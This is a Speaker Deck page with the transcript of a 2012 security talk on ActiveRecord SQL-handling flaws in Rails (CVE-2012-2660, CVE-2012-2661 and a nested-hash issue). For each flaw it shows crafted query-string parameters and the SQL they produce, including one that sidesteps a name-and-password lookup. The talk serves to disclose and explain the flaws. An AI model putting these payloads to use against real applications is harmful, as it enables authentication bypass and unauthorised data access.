Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
"Recent Rails SQL Issues" - 2012
Search
Sponsored
·
SiteGround - Reliable hosting with speed, security, and support you can count on.
→
Justin Collins
April 23, 2015
Programming
88
0
Share
Embed
Copy iframe code
Copy JS code
Copy link
Start on current slide
"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
More Decks by Justin Collins
See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
presidentbeef
0
170
The Evolution of Rails Security
presidentbeef
1
880
Brakeman RailsConf 2017 Lightning Talk
presidentbeef
0
170
Practical Static Analysis for Continuous Application Security
presidentbeef
0
260
"...But Doesn't Rails Take Care of Security for Me?"
presidentbeef
1
500
Continuous Security with Practical Static Analysis
presidentbeef
1
370
Security Automation at Twitter - Rise of the Machines
presidentbeef
0
300
The World of Rails Security - RailsConf 2015
presidentbeef
8
1.3k
Tales from the Crypt
presidentbeef
1
280
Other Decks in Programming
See All in Programming
Vite+ Unified Toolchain for the Web
naokihaba
0
360
気圧・高度・GPSを記録&可視化するアプリ「Koudo」を作った話
hjmkth
1
320
The NotImplementedError Problem in Ruby
koic
1
960
Datadog × OpenTelemetry 入門と実践のあいだ
kn_to_maxpno
1
180
エンジニアと一緒にテストコードの設計と実装を改善した話
mototakatsu
0
230
AIキャラアプリkaiwaの低遅延音声通話基盤をどう作ったか - AWS Gravitonで支える低遅延・低コストAI Agent基盤
mogamit
0
120
エージェンティックRAGにAWSで入門しよう!
har1101
9
1.8k
トークンをケチるな、設計しろ:GitHub Copilotを賢く使うコンテキスト戦略
ochtum
0
220
スマートグラスで並列バイブコーディング
hyshu
0
260
Signal Forms: Details & Live Coding @enterJS 2026 in Mannheim
manfredsteyer
PRO
0
200
Dataformのリポジトリを立ち上げるときにまずやること / dataform-day0-2026
snhryt
0
190
ふつうのFeature Flag実践入門
irof
8
4.2k
Featured
See All Featured
How to Align SEO within the Product Triangle To Get Buy-In & Support - #RIMC
aleyda
2
1.6k
Embracing the Ebb and Flow
colly
88
5.1k
A Soul's Torment
seathinner
6
3k
svc-hook: hooking system calls on ARM64 by binary rewriting
retrage
2
310
Designing Dashboards & Data Visualisations in Web Apps
destraynor
231
55k
How to optimise 3,500 product descriptions for ecommerce in one day using ChatGPT
katarinadahlin
PRO
1
3.6k
Easily Structure & Communicate Ideas using Wireframe
afnizarnur
194
17k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
128
56k
Documentation Writing (for coders)
carmenintech
77
5.4k
Tell your own story through comics
letsgokoyo
1
980
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
287
14k
Bootstrapping a Software Product
garrettdimon
PRO
307
120k
Transcript
Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661
CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x
and 3.x
ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end
Query Parameters ?name[] {"name"=>[nil]}
ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end
Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query
keys Affects Rails 3.x
ActiveRecord Query User.where(:name => params[:name])
ActiveRecord Query User.where("users.name" => params[:name])
Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}
ActiveRecord Query User.where(:name => {"users.id" => "1"})
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1
Unreleased Vulnerability Allows some manipulation of WHERE clause via nested
hashes in query values Affects 2.3.x and 3.x
ActiveRecord Query User.where(:name => params[:name], :password => params[:password])
Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}
ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1 AND "users"."id" = 1